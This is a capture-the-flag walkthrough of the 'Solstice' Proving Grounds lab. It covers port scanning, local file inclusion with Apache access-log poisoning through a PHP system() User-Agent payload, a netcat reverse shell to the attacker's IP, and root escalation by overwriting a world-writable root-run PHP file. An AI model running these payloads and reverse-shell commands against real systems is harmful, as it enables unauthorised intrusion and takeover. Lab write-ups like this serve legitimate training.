Post

Solstice

Posted Updated
Solstice Machine 🖥️
Solstice Machine 🖥️
By Shivendra Prajapati 7 min read

Description ⤵️

💡 Intermediate level machine

Let’s find the IP Address first »

Untitled

1

IP : 10.0.2.59

Port Scan Results ➡️

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75

┌──(kali㉿kali)-[~/Downloads/Proving_Ground/Solstice]
└─$ sudo nmap -sC -sV -p- -T4 -oN Nmap_results.txt 10.0.2.59
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-10 09:32 IST
Nmap scan report for 10.0.2.59
Host is up (0.00097s latency).
Not shown: 65525 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         pyftpdlib 1.5.6
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 10.0.2.59:21
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
22/tcp    open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 5b:a7:37:fd:55:6c:f8:ea:03:f5:10:bc:94:32:07:18 (RSA)
|   256 ab:da:6a:6f:97:3f:b2:70:3e:6c:2b:4b:0c:b7:f6:4c (ECDSA)
|_  256 ae:29:d4:e3:46:a1:b1:52:27:83:8f:8f:b0:c4:36:d1 (ED25519)
25/tcp    open  smtp        Exim smtpd 4.92
| smtp-commands: solstice Hello nmap.scanme.org [10.0.2.27], SIZE 52428800, 8BITMIME, PIPELINING, CHUNKING, PRDR, HELP
|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
80/tcp    open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesnt have a title (text/html).
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open              Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
2121/tcp  open  ftp         pyftpdlib 1.5.6
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drws------   2 www-data www-data     4096 Jun 18  2020 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 10.0.2.59:2121
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
3128/tcp  open  http-proxy  Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
8593/tcp  open  http        PHP cli server 5.5 or later (PHP 7.3.14-1)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Site doesnt have a title (text/html; charset=UTF-8).
54787/tcp open  http        PHP cli server 5.5 or later (PHP 7.3.14-1)
|_http-title: Site doesnt have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A8:97:64 (Oracle VirtualBox virtual NIC)
Service Info: Host: solstice: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: SOLSTICE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: \x00
|   NetBIOS computer name: SOLSTICE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-07-10T00:03:15-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2023-07-10T04:03:14
|_  start_date: N/A
|_clock-skew: mean: 1h20m01s, deviation: 2h18m34s, median: 0s

FTP Enumeration ⤵️

On port 2121 I tried anonymous login and I got in and I found this →

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

┌──(kali㉿kali)-[~/Downloads/Proving_Ground/Solstice]
└─$ ftp 10.0.2.59 2121
Connected to 10.0.2.59.
220 pyftpdlib 1.5.6 ready.
Name (10.0.2.59:kali): anonymous
331 Username ok, send password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering extended passive mode (|||40425|).
125 Data connection already open. Transfer starting.
drws------   2 www-data www-data     4096 Jun 18  2020 pub
226 Transfer complete.
ftp> get pub
local: pub remote: pub
229 Entering extended passive mode (|||60487|).
550 Is a directory.
ftp>

But I can’t get anything so lets leave it for now and lets enumerate further more .

Web Enumeration ⤵️

Untitled

Now lets look at port 8593 →

Untitled

let’s try LFI(Local File Inclusion) here →

Untitled

Now when I loaded the access.log file server was not able to proccess it so I reloaded the machine and tried it by first including the User-Agent with curl tool →

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

 ┌──(kali㉿kali)-[~/Downloads/Proving_Ground/Solstice]
└─$ curl 192.168.231.72 -A "<?php system(\$_GET['cmd']);?>"
 <head>
Currently configuring the database, try later.
 <style type ="text/css" >
   .footer{ 
       position: fixed;     
       text-align: center;    
       bottom: 0px; 
       width: 100%;
   }  
</style>
</head>
<body>
    <div class="footer">Proudly powered by phpIPAM 1.4</div>
</body>

Now lets load this reverse shell URL →

1

http://192.168.231.72:8593/index.php?book=../../../../../var/log/apache2/access.log&cmd=nc%20-e%20/bin/bash%20192.168.45.164%204444

In response to that I got this →

SHELL ⤵️

1
2
3
4
5
6
7
8
9
10
11
12

┌──(kali㉿kali)-[~/Downloads/Proving_Ground/Solstice]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.164] from (UNKNOWN) [192.168.231.72] 54424
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@solstice:/var/tmp/webserver$ whoami
whoami
www-data
www-data@solstice:/var/tmp/webserver$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@solstice:/var/tmp/webserver$

Found local.txt file →

1
2
3
4

www-data@solstice:~$ cat local.txt
cat local.txt
46dccaf36ae8422c374c3f9292c9f6c8
www-data@solstice:~$

Now while reconnaissance **I found this file →

1
2
3
4
5

www-data@solstice:/var/tmp/sv$ ls -al
total 12
drwsrwxrwx 2 root root 4096 Jul 10 04:07 .
drwxrwxrwt 9 root root 4096 Jul 10 04:09 ..
-rwxrwxrwx 1 root root 3463 Jul 10 04:07 index.php

Now I can modify this file with my php-reverse-shell file →

Now it time to run this file but I was confussed with the port number in which it is running on

So I checked the network configuration with ports and got this →

1
2
3
4
5
6
7
8

www-data@solstice:/var/tmp$ ss -tunlp | grep 127.0.0.1
tcp     LISTEN   0        5              127.0.0.1:631            0.0.0.0:*                                                     
                                
tcp     LISTEN   0        128            127.0.0.1:57             0.0.0.0:*                                                     
                                
tcp     LISTEN   0        80             127.0.0.1:3306           0.0.0.0:*                                                     
                                
www-data@solstice:/var/tmp$

Now I have a port number of 57 on which this index.php could be running so when I did the curl →

1

www-data@solstice:/var/tmp$ curl localhost:57

And I recived a reverse shell on port 4444 on Attackers machine as root →

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

┌──(kali㉿kali)-[~/Downloads/Proving_Ground/Solstice]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.164] from (UNKNOWN) [192.168.231.72] 54478
Linux solstice 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
 04:26:49 up 59 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: cant access tty; job control turned off
# /bin/bash -i
bash: cannot set terminal process group (17962): Inappropriate ioctl for device
bash: no job control in this shell
root@solstice:/# whoami
whoami
root
root@solstice:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@solstice:/# cd /root
cd /root
root@solstice:~# ls -al
ls -al
total 56
drwx------  9 root root 4096 Jul 10 03:30 .
drwxr-xr-x 18 root root 4096 Jun 29  2020 ..
lrwxrwxrwx  1 root root    9 Jun 26  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwx------  3 root root 4096 Jun 17  2020 .cache
drwxr-xr-x  3 root root 4096 Jun 13  2020 .config
drwxr-xr-x  2 root root 4096 Jun 19  2020 ftp
drwx------  3 root root 4096 Jun 18  2020 .gnupg
drwxr-xr-x  3 root root 4096 Jun 13  2020 .local
-rw-------  1 root root    0 Aug  7  2020 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   33 Jul 10 03:30 proof.txt
-rw-r--r--  1 root root   32 Aug 13  2020 root.txt
-rw-r--r--  1 root root   66 Jun 13  2020 .selected_editor
drwx------  2 root root 4096 Jun 19  2020 .ssh
-rw-r--r--  1 root root    0 Aug 13  2020 .wget-hsts
drwxr-xr-x  4 root root 4096 Jun 18  2020 .wine
root@solstice:~# cat root.txt
cat root.txt
Your flag is in another file...
root@solstice:~# cat proof.txt
cat proof.txt
d7acbf3dd425d114f36d106ffa12a6c7
root@solstice:~#

If you have any questions or suggestions, please leave a comment below. Thank You !

Proving Grounds Play
LFI PrivEsc
This post is licensed under CC BY 4.0 by the author.